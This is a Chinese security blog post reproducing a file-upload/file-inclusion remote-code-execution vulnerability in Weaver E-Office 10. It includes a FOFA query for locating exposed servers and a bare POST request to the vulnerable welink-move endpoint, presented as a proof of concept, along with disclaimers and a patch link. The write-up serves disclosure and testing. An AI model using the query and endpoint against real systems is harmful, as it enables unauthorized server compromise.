漏洞复现--泛微E-Office 10任意文件上传漏洞
芝士土拨鼠
- 关注
漏洞复现--泛微E-Office 10任意文件上传漏洞
免责声明:
文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行承担!
一:漏洞描述
近期,长亭科技监测到泛微官方发布了新补丁修复了一处远程代码执行漏洞。
长亭应急团队经过分析后发现该漏洞是通过文件上传配合文件包含实现远程代码执行。
泛微E-Office 10在 10.0_20230821 版本之前存在远程代码执行漏洞,该漏洞是通过文件上传配合文件包含实现远程代码执行,攻击者可利用此漏洞上传恶意文件并控制服务器。
二:漏洞影响版本
version< e-office 10.0_20230821
三:网络空间测绘查询
fofa:
body="eoffice10" && body="eoffice_loading_tip"
四:漏洞复现
poc:
POST /eoffice10/server/public/api/welink/welink-move HTTP/1.1
Host: ip:port
User-Agent: Go-http-client/1.1
Content-Length: 0
Accept-Encoding: gzip
即POST请求
五:漏洞检测
XPOC检测:
六:修复建议
目前厂商已发布补丁http://v10.e-office.cn/eoffice9update/20220525/webroot.zip
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 芝士土拨鼠 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
APP攻防&Android逆向&HOOK抓包&组件安全
2024-02-23
漏洞复现--Confluence远程代码执行漏洞(CVE-2023-22527)
2024-01-23
漏洞复现--Likeshop任意文件上传(CVE-2024-0352)
2024-01-16
文章目录